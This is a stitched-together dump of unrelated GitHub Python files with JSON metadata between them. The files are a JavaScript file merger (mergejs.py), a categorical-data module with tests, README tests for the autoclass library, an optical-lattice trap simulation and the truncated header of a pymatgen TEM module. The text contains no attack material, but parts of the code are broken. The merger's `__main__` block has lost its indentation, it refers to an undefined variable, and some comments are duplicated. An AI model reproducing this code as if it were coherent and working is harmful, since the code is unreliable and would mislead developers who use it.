RE_REQUIRE = "@requires:? (.*)\n" # TODO: Ensure in comment?

class SourceFile:
    """
    One JavaScript source file: its path, raw source text, and the
    dependency paths it declares via `// @requires <path>` comments.
    """

    def __init__(self, filepath, source):
        """
        Remember where the file lives and what it contains.
        """
        self.filepath = filepath
        self.source = source
        self.requiredBy = []

    def _getRequirements(self):
        """
        Scan the source for @requires declarations and return the list
        of referenced file paths.
        """
        # TODO: Cache?
        return re.compile(RE_REQUIRE).findall(self.source)

    requires = property(fget=_getRequirements, doc="")
def usage(filename):
    """
    Displays a usage message.

    *filename* is the name of the running script (typically
    sys.argv[0]), interpolated into the message.
    """
    print "%s [-c <config file>] <output.js> <directory> [...]" % filename
class Config:
    """
    Represents a parsed configuration file.

    A configuration file should be of the following form:

        [first]
        3rd/prototype.js
        core/application.js
        core/params.js
        # A comment

        [last]
        core/api.js # Another comment

        [include]

        [exclude]
        3rd/logger.js

    All four headings -- [first], [last], [include], [exclude] -- are
    required, in that order; the parser slices the line list between
    their positions.

    The files listed in the `first` section will be forced to load
    *before* all other files (in the order listed). The files in `last`
    section will be forced to load *after* all the other files (in the
    order listed).

    If the `include` section is non-empty, only the files listed there
    (plus the `first` files) are imported. The files listed in the
    `exclude` section will not be imported.

    Any text appearing after a # symbol indicates a comment.
    """
    def __init__(self, filename):
        """
        Parses the content of the named file and stores the values.
        """
        # Strip trailing comments/whitespace; drop blank and comment-only lines.
        lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
                 for line in open(filename)
                 if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
        self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
        self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
        self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
        self.exclude = lines[lines.index("[exclude]") + 1:]
def run (sourceDirectory, outputFilename = None, configFile = None):
    """Merge all .js files under sourceDirectory into one string, ordered
    so every file appears after its @requires dependencies.

    Writes the result to outputFilename when given, and always returns it.
    """
    cfg = None
    if configFile:
        cfg = Config(configFile)
    allFiles = []
    ## Find all the Javascript source files
    for root, dirs, files in os.walk(sourceDirectory):
        for filename in files:
            if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
                # Path relative to sourceDirectory, normalized to forward slashes.
                filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
                filepath = filepath.replace("\\", "/")
                if cfg and cfg.include:
                    # An [include] section whitelists what gets merged.
                    if filepath in cfg.include or filepath in cfg.forceFirst:
                        allFiles.append(filepath)
                elif (not cfg) or (filepath not in cfg.exclude):
                    allFiles.append(filepath)
    ## Header inserted at the start of each file in the output
    HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
    files = {}
    order = [] # List of filepaths to output, in a dependency satisfying order
    ## Import file source code
    ## TODO: Do import when we walk the directories above?
    for filepath in allFiles:
        print "Importing: %s" % filepath
        fullpath = os.path.join(sourceDirectory, filepath).strip()
        content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
        files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
    print
    from toposort import toposort
    complete = False
    resolution_pass = 1
    # Repeat the topological sort until it converges: each pass may pull
    # in files that were only referenced via @requires, which can add
    # new dependencies of their own.
    while not complete:
        order = [] # List of filepaths to output, in a dependency satisfying order
        nodes = []
        routes = []
        ## Resolve the dependencies
        print "Resolution pass %s... " % resolution_pass
        resolution_pass += 1
        for filepath, info in files.items():
            nodes.append(filepath)
            for neededFilePath in info.requires:
                routes.append((neededFilePath, filepath))
        for dependencyLevel in toposort(nodes, routes):
            for filepath in dependencyLevel:
                order.append(filepath)
                if not files.has_key(filepath):
                    # A dependency that was not on disk scan: import it now.
                    print "Importing: %s" % filepath
                    fullpath = os.path.join(sourceDirectory, filepath).strip()
                    content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
                    files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
        # Double check all dependencies have been met
        complete = True
        try:
            for fp in order:
                if max([order.index(rfp) for rfp in files[fp].requires] +
                       [order.index(fp)]) != order.index(fp):
                    complete = False
        except:
            # Missing dependency (e.g. KeyError) -- run another pass.
            complete = False
        print
    ## Move forced first and last files to the required position
    if cfg:
        print "Re-ordering files..."
        order = cfg.forceFirst + [item
                     for item in order
                     if ((item not in cfg.forceFirst) and
                         (item not in cfg.forceLast))] + cfg.forceLast
        print
    ## Output the files in the determined order
    result = []
    for fp in order:
        f = files[fp]
        print "Exporting: ", f.filepath
        result.append(HEADER % f.filepath)
        source = f.source
        result.append(source)
        if not source.endswith("\n"):
            result.append("\n")
    print "\nTotal files merged: %d " % len(files)
    if outputFilename:
        print "\nGenerating: %s" % (outputFilename)
        open(outputFilename, "w").write("".join(result))
    return "".join(result)
if __name__ == "__main__":
import getopt
options, args = getopt.getopt(sys.argv[1:], "-c:")
try:
outputFilename = args[0]
except IndexError:
usage(sys.argv[0])
raise SystemExit
else:
sourceDirectory = args[1]
if not sourceDirectory:
usage(sys.argv[0])
raise SystemExit
configFile = None
if options and options[0][0] == "-c":
configFile = options[0][1]
print "Parsing configuration file: %s" % filename
run( sourceDirectory, outputFilename, configFile )
| {
"content_hash": "8cf01453b89b8b75fc987219cb569f8f",
"timestamp": "",
"source": "github",
"line_count": 252,
"max_line_length": 102,
"avg_line_length": 30.166666666666668,
"alnum_prop": 0.59221257563799,
"repo_name": "spatindsaongo/geos",
"id": "865081e1acc6b9643572a7475beb2a56505b7773",
"size": "7602",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "web/js/openlayers/tools/mergejs.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "7006"
},
{
"name": "JavaScript",
"bytes": "3078580"
},
{
"name": "PHP",
"bytes": "293650"
},
{
"name": "Perl",
"bytes": "9860"
},
{
"name": "Python",
"bytes": "180363"
},
{
"name": "Shell",
"bytes": "2567"
}
],
"symlink_target": ""
} |
__all__ = ["Categorical", "code"]
import numpy as np
from charlton import CharltonError
# A simple wrapper around some categorical data. Provides basically no
# services, but it holds data fine... eventually it'd be nice to make a custom
# dtype for this, but doing that right will require fixes to numpy itself.
# A simple wrapper around some categorical data. Provides basically no
# services, but it holds data fine... eventually it'd be nice to make a custom
# dtype for this, but doing that right will require fixes to numpy itself.
class Categorical(object):
    """Integer-coded categorical data: a flat int array of level indices
    plus the tuple of level values, with optional ordering/contrast."""

    def __init__(self, int_array, levels, ordered=False, contrast=None):
        # Flatten and coerce the codes; levels become an immutable tuple.
        self.int_array = np.asarray(int_array, dtype=int).ravel()
        self.levels = tuple(levels)
        self.ordered = ordered
        self.contrast = contrast

    @classmethod
    def from_strings(cls, sequence, levels=None, **kwargs):
        """Encode *sequence* against *levels* (sorted-unique values of the
        sequence when not given). Extra kwargs pass through to __init__.

        Raises CharltonError for unhashable items/levels or for entries
        not present in the level set.
        """
        if levels is None:
            try:
                levels = list(set(sequence))
            except TypeError:
                raise CharltonError("Error converting data to categorical: "
                                    "all items must be hashable")
            # Only auto-derived levels are sorted; explicit levels keep
            # their caller-specified order.
            levels.sort()
        level_to_int = {}
        for i, level in enumerate(levels):
            try:
                level_to_int[level] = i
            except TypeError:
                raise CharltonError("Error converting data to categorical: "
                                    "all levels must be hashable (and %r isn't)"
                                    % (level,))
        int_array = np.empty(len(sequence), dtype=int)
        for i, entry in enumerate(sequence):
            try:
                int_array[i] = level_to_int[entry]
            # Fix: a missing dict key raises KeyError, not ValueError --
            # the original `except ValueError` never fired, so unknown
            # entries escaped as a bare KeyError instead of the intended
            # CharltonError. TypeError covers unhashable entries.
            except (KeyError, TypeError):
                raise CharltonError("Error converting data to categorical: "
                                    "object '%r' does not match any of the "
                                    "expected levels" % (entry,))
        return cls(int_array, levels, **kwargs)
def test_categorical():
    """Exercise Categorical construction and from_strings level handling.

    Fix: removed a stray Python 2 debug statement (`print c3.int_array`)
    left in the test body.
    """
    c = Categorical([0, 1, 2], levels=["a", "b", "c"])
    assert isinstance(c.int_array, np.ndarray)
    assert np.all(c.int_array == [0, 1, 2])
    assert isinstance(c.levels, tuple)
    assert c.levels == ("a", "b", "c")
    assert not c.ordered
    assert c.contrast is None
    # Auto-derived levels are sorted.
    c2 = Categorical.from_strings(["b", "a", "c"])
    assert c2.levels == ("a", "b", "c")
    assert np.all(c2.int_array == [1, 0, 2])
    assert not c2.ordered
    # Explicit levels keep their given (unsorted) order.
    c3 = Categorical.from_strings(["b", "a", "c"],
                                  levels=["a", "c", "d", "b"],
                                  ordered=True)
    assert c3.levels == ("a", "c", "d", "b")
    assert np.all(c3.int_array == [3, 0, 1])
    assert c3.ordered
    assert c3.contrast is None
    c4 = Categorical.from_strings(["a"] * 100, levels=["b", "a"])
    assert c4.levels == ("b", "a")
    assert np.all(c4.int_array == 1)
    assert not c4.ordered
    assert c4.contrast is None
    # Float codes are coerced to int.
    c5 = Categorical([[0.0], [1.0], [2.0]], levels=["a", "b", "c"])
    assert np.all(c5.int_array == [0, 1, 2])
    assert c5.int_array.dtype == np.dtype(int)
class CategoricalTransform(object):
    """Stateful transform that learns the sorted set of observed levels
    across memorize_chunk() calls and then encodes data against them."""

    def __init__(self):
        self._levels = set()
        self._levels_tuple = None

    def memorize_chunk(self, data, levels=None, **kwargs):
        """Accumulate levels from raw (non-Categorical) data when no
        explicit levels were supplied."""
        if levels is None and not isinstance(data, Categorical):
            self._levels.update(np.asarray(data).ravel())

    def memorize_finish(self):
        """Freeze the accumulated levels into a sorted tuple."""
        self._levels_tuple = tuple(sorted(self._levels))

    def transform(self, data, levels=None, **kwargs):
        """Encode *data* as a Categorical, re-wrapping Categorical input
        with the extra kwargs applied to a copy."""
        if not isinstance(data, Categorical):
            chosen = self._levels_tuple if levels is None else levels
            return Categorical.from_strings(data, levels=chosen, **kwargs)
        if levels is not None and data.levels != levels:
            raise CharltonError("changing levels of categorical data "
                                "not supported yet")
        return Categorical(data.int_array, data.levels, **kwargs)

    # This is for the use of the ModelSpec building code, which has a special
    # case where it uses this transform to convert string arrays (and similar)
    # into Categoricals, and after memorizing the data it needs to know what
    # the levels were.
    def levels(self):
        assert self._levels_tuple is not None
        return self._levels_tuple
def test_CategoricalTransform():
    """Exercise CategoricalTransform memorization and transformation."""
    # Levels are accumulated across chunks and sorted at finish time.
    t1 = CategoricalTransform()
    t1.memorize_chunk(["a", "b"])
    t1.memorize_chunk(["a", "c"])
    t1.memorize_finish()
    c1 = t1.transform(["a", "c"])
    assert c1.levels == ("a", "b", "c")
    assert np.all(c1.int_array == [0, 2])
    # Explicit levels bypass memorization; kwargs pass through.
    t2 = CategoricalTransform()
    t2.memorize_chunk(["a", "b"], contrast="foo", levels=["c", "b", "a"])
    t2.memorize_chunk(["a", "c"], contrast="foo", levels=["c", "b", "a"])
    t2.memorize_finish()
    c2 = t2.transform(["a", "c"], contrast="foo", levels=["c", "b", "a"])
    assert c2.levels == ("c", "b", "a")
    assert np.all(c2.int_array == [2, 0])
    assert c2.contrast == "foo"
    # Check that it passes through already-categorical data correctly,
    # changing the attributes on a copy only:
    c = Categorical.from_strings(["a", "b"], levels=["b", "a"],
                                 ordered=False, contrast="foo")
    t3 = CategoricalTransform()
    t3.memorize_chunk(c, ordered=True, contrast="bar")
    t3.memorize_finish()
    c_t = t3.transform(c, ordered=True, contrast="bar")
    assert np.all(c_t.int_array == c.int_array)
    assert c_t.levels == c.levels
    assert not c.ordered
    assert c_t.ordered
    assert c.contrast == "foo"
    assert c_t.contrast == "bar"
# This is just an alias for the above, but with rearranged arguments
# This is just an alias for the above, but with rearranged arguments
class ContrastTransform(CategoricalTransform):
    """CategoricalTransform variant that takes the contrast as a
    positional argument instead of a keyword."""

    def memorize_chunk(self, data, new_contrast):
        super(ContrastTransform, self).memorize_chunk(data, contrast=new_contrast)

    def transform(self, data, new_contrast):
        return super(ContrastTransform, self).transform(data, contrast=new_contrast)
def test_ContrastTransform():
    """The positional contrast argument is forwarded as contrast=..."""
    t1 = ContrastTransform()
    t1.memorize_chunk(["a", "b"], "foo")
    t1.memorize_chunk(["a", "c"], "foo")
    t1.memorize_finish()
    c1 = t1.transform(["a", "c"], "foo")
    assert c1.levels == ("a", "b", "c")
    assert np.all(c1.int_array == [0, 2])
    assert c1.contrast == "foo"
| {
"content_hash": "f19660a8ac492852e178feb62af6f8ce",
"timestamp": "",
"source": "github",
"line_count": 157,
"max_line_length": 80,
"avg_line_length": 39.43312101910828,
"alnum_prop": 0.5795509610725247,
"repo_name": "wesm/charlton",
"id": "ffda80c394b0f6c78bd7e79650607634d57cbde7",
"size": "6321",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "charlton/categorical.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [],
"symlink_target": ""
} |
import sys
import pytest
from numbers import Real, Integral
from valid8 import Boolean, validate, validate_arg, InputValidationError
from valid8.validation_lib import instance_of, is_multiple_of
try:
from typing import Optional
except ImportError:
pass
from autoclass import autoargs, autoprops, setter_override, autoclass
def test_readme_index_pyfields():
    """Mirror of the README example combining @autoclass with pyfields
    fields (type checking, defaults, validators)."""
    from pyfields import field

    @autoclass
    class House(object):
        name = field(check_type=True, type_hint=str, doc="the name of your house")
        nb_floors = field(default=100, check_type=True, type_hint=int, doc="the nb floors",
                          validators={"should be positive": lambda x: x >= 0,
                                      "should be a multiple of 100": lambda x: x % 100 == 0})

    h = House(name="mine")
    # 101 violates the multiple-of-100 validator.
    with pytest.raises(ValueError):
        h.nb_floors = 101
    assert str(h) == "House(name='mine', nb_floors=100)"
    a = House('my_house', 200)
    # @autoclass supplies __str__, keys(), __hash__ and dict equality.
    assert str(a) == "House(name='my_house', nb_floors=200)"
    assert [att for att in a.keys()] == ['name', 'nb_floors']
    assert {a, a} == {a}
    assert a == {'name': 'my_house', 'nb_floors': 200}
def test_readme_index_basic():
    """Check the first basic readme example: @autoclass on a plain __init__."""
    @autoclass
    class House(object):
        def __init__(self, name, nb_floors=1):
            pass

    house = House('my_house', 3)
    # @autoclass generates str/repr, dict-like access, hash and eq
    assert str(house) == "House(name='my_house', nb_floors=3)"
    assert list(house.keys()) == ['name', 'nb_floors']
    assert {house, house} == {house}
    assert house == {'name': 'my_house', 'nb_floors': 3}
def test_readme_index_basic2():
    """Check the second basic readme example: @setter_override hooks the
    generated setter. The module-level global `t` records setter calls."""
    global t
    t = ''

    @autoclass
    class House(object):
        def __init__(self, name, nb_floors=1):
            pass

        @setter_override
        def nb_floors(self, nb_floors=1):
            global t
            t = 'Set nb_floors to {}'.format(nb_floors)
            self._nb_floors = nb_floors

    assert t == ''
    house = House('my_house')
    # the constructor triggers the overridden setter with the default value
    assert t == 'Set nb_floors to 1'
    house.nb_floors = 3
    assert t == 'Set nb_floors to 3'
@pytest.mark.skipif(sys.version_info < (3, 0), reason="type hints do not work in python 2")
@pytest.mark.skipif(sys.version_info >= (3, 7), reason="enforce does not work correctly under python 3.7+")
def test_readme_enforce_simple():
    """Delegate to the PEP484 variant, kept in a separate module because its
    syntax only parses under python 3."""
    from ._tests_pep484 import test_readme_enforce_simple as _impl
    _impl()
# (previously also guarded by: skipif sys.version_info < (3, 0))
@pytest.mark.skip(reason="Skip until I understand why pytypes makes pytest crash")
def test_readme_index_pytypes_simple():
    """Delegate to the PEP484 variant of the pytypes readme example."""
    from ._tests_pep484 import test_readme_index_pytypes_simple as _impl
    _impl()
def test_readme_index_valid8_simple():
    """Check the valid8 readme example: constructor args validated through
    @validate_arg with custom error types."""
    from mini_lambda import s, x, Len

    # the two custom validation errors used by the example
    class InvalidNameError(InputValidationError):
        help_msg = 'name should be a non-empty string'

    class InvalidSurfaceError(InputValidationError):
        help_msg = 'Surface should be between 0 and 10000 and be a multiple of 100.'

    @autoclass
    class House(object):
        @validate_arg('name', instance_of(str), Len(s) > 0,
                      error_type=InvalidNameError)
        @validate_arg('surface', (x >= 0) & (x < 10000), is_multiple_of(100),
                      error_type=InvalidSurfaceError)
        def __init__(self, name, surface=None):
            pass

    house = House('sweet home', 200)
    # surface is nonable because its default value is None
    house.surface = None
    with pytest.raises(InvalidNameError):
        house.name = 12
    with pytest.raises(InvalidSurfaceError):
        house.surface = 10000
@pytest.mark.skipif(sys.version_info < (3, 0), reason="type hints do not work in python 2")
@pytest.mark.skipif(sys.version_info >= (3, 7), reason="enforce does not work correctly under python 3.7+")
def test_readme_index_enforce_valid8():
    """Delegate to the PEP484 variant of the enforce + valid8 readme example."""
    from ._tests_pep484 import test_readme_index_enforce_valid8 as _impl
    _impl()
def test_readme_pycontracts_simple():
    """Check the simple PyContracts + @autoclass readme example."""
    from contracts import contract, ContractNotRespected

    @autoclass
    class House(object):
        @contract(name='str[>0]',
                  surface='None|(int,>=0,<10000)')
        def __init__(self, name, surface):
            pass

    house = House('sweet home', 200)
    house.surface = None  # allowed: the contract declares surface as nonable
    with pytest.raises(ContractNotRespected):
        house.name = ''  # empty string violates 'str[>0]'
    with pytest.raises(ContractNotRespected):
        house.surface = 10000  # upper bound is exclusive
def test_readme_old_way():
    """ Makes sure that the code in the documentation page is correct for the 'old way' of writing classes """
    class HouseConfiguration(object):
        def __init__(self,
                     name,                # type: str
                     surface,             # type: Real
                     nb_floors=1,         # type: Optional[Integral]
                     with_windows=False   # type: Boolean
                     ):
            self.name = name
            self.surface = surface
            self.nb_floors = nb_floors
            self.with_windows = with_windows
        # --name
        @property
        def name(self):
            return self._name
        @name.setter
        def name(self,
                 name  # type: str
                 ):
            validate('name', name, instance_of=str)
            self._name = name
        # --surface
        @property
        def surface(self):
            # type: (...) -> Real
            return self._surface
        @surface.setter
        def surface(self,
                    surface  # type: Real
                    ):
            validate('surface', surface, instance_of=Real, min_value=0, min_strict=True)
            self._surface = surface
        # --nb_floors
        @property
        def nb_floors(self):
            # type: (...) -> Optional[Integral]
            return self._nb_floors
        @nb_floors.setter
        def nb_floors(self,
                      nb_floors  # type: Optional[Integral]
                      ):
            validate('nb_floors', nb_floors, instance_of=Integral, enforce_not_none=False)
            # NOTE: the '# !**' marker flags what is presumably a deliberate
            # copy/paste bug carried over from the docs (one would expect
            # self._nb_floors here) to illustrate how error-prone the manual
            # boilerplate is. The test still passes because nb_floors is never
            # read back below. Do not "fix" without checking the readme.
            self._surface = nb_floors  # !**
        # --with_windows
        @property
        def with_windows(self):
            # type: (...) -> Boolean
            return self._with_windows
        @with_windows.setter
        def with_windows(self,
                         with_windows  # type: Boolean
                         ):
            validate('with_windows', with_windows, instance_of=Boolean)
            self._with_windows = with_windows
    # smoke-check: construction runs all four setters
    HouseConfiguration('test', 0.1)
def test_readme_pycontracts_complex():
    """Check the full PyContracts readme example, including a setter override."""
    from contracts import contract, ContractNotRespected

    @autoprops
    class HouseConfiguration(object):
        @autoargs
        @contract(name='str[>0]',
                  surface='(int|float),>=0',
                  nb_floors='None|int',
                  with_windows='bool')
        def __init__(self,
                     name,                # type: str
                     surface,             # type: Real
                     nb_floors=1,         # type: Optional[Integral]
                     with_windows=False   # type: Boolean
                     ):
            pass

        # overridden setter for surface - no need to repeat the @contract
        @setter_override
        def surface(self,
                    surface  # type: Real
                    ):
            assert surface > 0
            self._surface = surface

    config = HouseConfiguration('test', 0.1)
    config.nb_floors = None  # allowed by the 'None|int' contract
    with pytest.raises(ContractNotRespected):
        config.nb_floors = 2.2  # floats are rejected
    with pytest.raises(ContractNotRespected):
        config.surface = -1  # negative surface is rejected
@pytest.mark.skipif(sys.version_info < (3, 0), reason="type hints do not work in python 2")
@pytest.mark.skip(reason="open bug in pytypes https://github.com/Stewori/pytypes/issues/19")
def test_readme_pytypes_validate_complex():
    """Delegate to the PEP484 variant of the pytypes + valid8 complex example."""
    from ._tests_pep484 import test_readme_pytypes_validate_complex as _impl
    _impl()
| {
"content_hash": "6e48f68c4f5539abf15a121c067706fc",
"timestamp": "",
"source": "github",
"line_count": 272,
"max_line_length": 110,
"avg_line_length": 32.00735294117647,
"alnum_prop": 0.5822421318630829,
"repo_name": "smarie/python-classtools-autocode",
"id": "1bc25eb3e3c3979e2c8caa6aa154c367f84061bb",
"size": "8706",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "autoclass/tests/doc/test_readme_index.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "60848"
}
],
"symlink_target": ""
} |
'''
Created on Aug 3, 2015
@author: Max
'''
import numpy as np
from liexperiment.lithium.polarizability import polarizability
from amo.core.physicalconstants import PhysicalConstantsSI as c
import amo.optics.monochromaticfields as field
from liexperiment.traps.calibrations import TrapCalibrations
import matplotlib.pylab as plt
import unittest
# NOTE(review): this astropy import appears unused in this module and looks
# like an accidental IDE auto-import -- confirm before removing.
from astropy.coordinates.tests import accuracy
class Trap(object):
    """A scalar trapping potential sampled on coordinate arrays.

    Instances expose a single callable attribute ``potential(x, y, z)``
    returning the potential at the given coordinates.
    """

    @classmethod
    def from_laser_field(cls, monochromatic_field, polarizability):
        """Build a dipole trap from a monochromatic field and a polarizability.

        The potential is -alpha/(2 eps0 c) times the time-averaged intensity.
        """
        trap = cls()

        def dipole_potential(x, y, z):
            prefactor = -polarizability / (2 * c.epsilon0 * c.c)
            return prefactor * monochromatic_field.get_intensity_time_averaged(x, y, z)

        trap.potential = dipole_potential
        return trap

    @classmethod
    def from_multiple_traps(cls, traps):
        """Build a trap whose potential is the sum of the given traps' potentials."""
        combined = cls()

        def summed_potential(x, y, z):
            contributions = np.array([t.potential(x, y, z) for t in traps])
            return np.sum(contributions, axis=0)

        combined.potential = summed_potential
        return combined

    def plot_potential_along_line(self, ax, direction, center, extents, yscale=1.0, num1d=5):
        """Plot the potential along a line onto *ax*, scaling values by *yscale*."""
        param, potential = self.get_potential_along_line(direction, center, extents, num1d)
        ax.plot(param, yscale * potential)

    def get_potential_along_line(self, direction, center, extents, num1d=5000):
        """Sample the potential along a straight line.

        The line passes through *center* along the unit vector parallel to
        *direction*; *extents* gives the (min, max) of the line parameter.
        Returns ``(param, potential)``, both arrays of length *num1d*.
        """
        unit = np.asarray(direction, dtype=float)
        unit = unit / np.sqrt(np.dot(unit, unit))
        origin = np.asarray(center)
        param = np.linspace(extents[0], extents[1], num1d)
        coords = [origin[i] + param * unit[i] for i in range(3)]
        return param, self.potential(coords[0], coords[1], coords[2])
class Lattice2D(Trap):
    """Dipole trap produced by a 2d optical lattice field."""
    def __init__(self, theta, phi, waist, power, wavelength, offset, phase0=0.0, visibility=1.0):
        laser = field.Lattice2d(theta, phi, waist, power, wavelength,
                                offset=offset, phase0=phase0, visibility=visibility)
        # polarizability is evaluated at the lattice wavelength
        base = Trap.from_laser_field(laser, polarizability(laser.wavelength))
        self.potential = base.potential
class Lattice1D(Trap):
    """Dipole trap produced by a 1d optical lattice field."""
    def __init__(self, theta, phi, waist, power, wavelength, offset):
        laser = field.Lattice1d(theta, phi, waist, power, wavelength, offset=offset)
        # polarizability is evaluated at the lattice wavelength
        base = Trap.from_laser_field(laser, polarizability(laser.wavelength))
        self.potential = base.potential
class LiLattice(Trap):
    """Combined lattice potential: two 2d lattices (NE, NW), a 1d lattice (Ve)
    and an optional accordion 1d lattice, summed into a single potential.

    Beam geometry (angles, waists, wavelengths, offsets, phases) comes from the
    TrapCalibrations object ``cal``; only per-beam powers are chosen here.
    """
    def __init__(self, cal, NE_power, NW_power, Ve_power, accordion_power=0.0, dimple_power=0.0):
        self.NE_power = NE_power
        self.NW_power = NW_power
        self.Ve_power = Ve_power
        self.accordion_power = accordion_power
        self.dimple_power = dimple_power
        self.calibration = cal
        # NOTE(review): stores the NE lattice *angle* under the name
        # "NE_spacing" -- confirm whether this should be a computed lattice
        # spacing instead of cal.NE_theta.
        self.NE_spacing = cal.NE_theta
        traps = []
        # NE
        NE_field = field.Lattice2d(cal.NE_theta, cal.NE_phi, cal.NE_waist, NE_power, cal.NE_wavelength, offset=cal.NE_offset, \
                                   phase=cal.NE_phase, t_retro=cal.NE_t_retro)
        self.NE = Trap.from_laser_field(NE_field, polarizability(NE_field.wavelength))
        traps.append(self.NE)
        # NW
        NW_field = field.Lattice2d(cal.NW_theta, cal.NW_phi, cal.NW_waist, NW_power, cal.NW_wavelength, offset=cal.NW_offset, \
                                   phase=cal.NW_phase, t_retro=cal.NW_t_retro)
        self.NW = Trap.from_laser_field(NW_field, polarizability(NW_field.wavelength))
        traps.append(self.NW)
        # Ve
        Ve_field = field.Lattice1d(cal.Ve_theta, cal.Ve_phi, cal.Ve_waist, self.Ve_power, cal.Ve_wavelength, offset=cal.Ve_offset)
        self.Ve = Trap.from_laser_field(Ve_field, polarizability(Ve_field.wavelength))
        traps.append(self.Ve)
        # accordion (power may be 0.0, in which case it contributes nothing)
        accordion_field = field.Lattice1d(cal.accordion_theta, cal.accordion_phi, cal.accordion_waist, self.accordion_power, cal.accordion_wavelength, offset=cal.accordion_offset)
        self.accordion = Trap.from_laser_field(accordion_field, polarizability(accordion_field.wavelength))
        traps.append(self.accordion)
        # the dimple beam is accepted in the signature but not yet supported
        if dimple_power != 0.0:
            raise Exception("Dimple not implemented yet")
        # total potential is the element-wise sum of all component potentials
        self.potential = lambda x, y, z: np.sum(np.array([trap.potential(x, y, z) for trap in traps]), axis=0)
    def chemical_potential(self, l, m, n):
        # TODO: not implemented yet -- currently a stub returning None.
        pass
class TestTrap(unittest.TestCase):
    """Visual smoke tests: each test plots a potential cut with matplotlib.

    Methods prefixed with an underscore are deliberately disabled (unittest
    only discovers methods starting with 'test'). Note that plt.show() blocks
    until the plot window is closed.
    """
    def _testPolarizability(self):
        # disabled: plots a single 2d-lattice potential along z
        wavelength = 1.064e-6
        waist = 80.0e-6
        theta = 70.0
        phi = 0.0
        offset = [0.e-6, 0.e-6, -0.57e-6]
        power = 0.5
        extents_line = [-5e-6, 5e-6]
        center_line = [0., 0., 0.e-6]
        direction = [0, 0 , 1]
        lat_field = field.Lattice2d(theta, phi, waist, power, wavelength, offset=offset, phase0=0.0)
        lat = Trap.from_laser_field(lat_field, polarizability(lat_field.wavelength))
        fig = plt.figure()
        ax = fig.add_subplot(1, 1, 1)
        # yscale=1/h/1e6 presumably converts energy to frequency in MHz -- confirm
        lat.plot_potential_along_line(ax, direction, center_line, extents_line, yscale=1.0 / c.h / 1.0e6, num1d=5000)
        plt.show()
    def _testMultiTrap(self):
        # disabled: plots the sum of a 2d lattice and a (zero-power) 1d lattice
        wavelength = 1.064e-6
        waist = 108.0e-6
        waist1 = 42.9e-6
        theta = 69.0
        theta_vert = 5.86
        phi = 0.0
        offset = [0.e-6, 0.e-6, 0.0e-6]
        power = 1.0
        power_vert = 0.0
        extents_line = [-20e-6, 20e-6]
        center_line = [0., 0., 0.0]
        direction = [0, 0, 1]
        t_retro = 0.97
        lat_field = field.Lattice2d(theta, phi, waist, power, wavelength, offset=offset, phase0=0.0, phase1=0.0, t_retro=t_retro)
        lat_field1 = field.Lattice1d(theta_vert, phi, waist1, power_vert, wavelength, offset=offset)
        lat = Trap.from_laser_field(lat_field, polarizability(lat_field.wavelength))
        lat1 = Trap.from_laser_field(lat_field1, polarizability(lat_field.wavelength))
        mytrap = Trap.from_multiple_traps([lat, lat1])
        fig = plt.figure()
        ax = fig.add_subplot(1, 1, 1)
        mytrap.plot_potential_along_line(ax, direction, center_line, extents_line, yscale=1.0 / c.h / 1.0e6, num1d=5000)
        plt.show()
    def testLiLattice(self):
        # active test: plots the combined LiLattice potential along y at the
        # calibrated substrate distance
        NE_power = 0.5
        NW_power = 0.5
        Ve_power = 0.2
        accordion_power = 0.0
        cal = TrapCalibrations()
        lat = LiLattice(cal, NE_power, NW_power, Ve_power, accordion_power=accordion_power)
        center_line = [0., 0., cal.substrate_distance]
        extents_line = [-50.e-6, 50.e-6]
        direction = [0, 1, 0]
        fig = plt.figure()
        ax = fig.add_subplot(1, 1, 1)
        lat.plot_potential_along_line(ax, direction, center_line, extents_line, yscale=1.0 / c.h / 1.0e6, num1d=5000)
        plt.show()
if __name__ == "__main__":
    unittest.main()
    # NOTE(review): unittest.main() calls sys.exit() by default, so this
    # plt.show() is normally unreachable; pass exit=False above if the plots
    # are meant to be displayed after the test run.
    plt.show()
| {
"content_hash": "cb06f730b7c96e04253eda1208bffc18",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 179,
"avg_line_length": 43.66451612903226,
"alnum_prop": 0.6134751773049646,
"repo_name": "MaxParsons/amo-physics",
"id": "70e84a2b71eae2fb8c3ebf941e04c281c340eeb6",
"size": "6768",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "liexperiment/traps/trap.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "121239"
}
],
"symlink_target": ""
} |
"""
This module implements a TEM pattern calculator.
"""
import json
import os
from collections import namedtuple
from fractions import Fraction
from functools import lru_cache
from typing import Dict, List, Tuple, cast, Union
import numpy as np
import pandas as pd
import plotly.graph_objs as go
import scipy.constants as sc
from pymatgen.analysis.diffraction.core import AbstractDiffractionPatternCalculator
from pymatgen.core.structure import Structure
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.util.string import latexify_spacegroup, unicodeify_spacegroup
# Fitted atomic scattering coefficients keyed by element symbol; consumed by
# TEMCalculator.x_ray_factors when evaluating x-ray form factors.
with open(os.path.join(os.path.dirname(__file__), "atomic_scattering_params.json")) as f:
    ATOMIC_SCATTERING_PARAMS = json.load(f)

__author__ = "Frank Wan, Jason Liang"
__copyright__ = "Copyright 2020, The Materials Project"
__version__ = "0.22"
__maintainer__ = "Jason Liang"
__email__ = "fwan@berkeley.edu, yhljason@berkeley.edu"
__date__ = "03/31/2020"
class TEMCalculator(AbstractDiffractionPatternCalculator):
"""
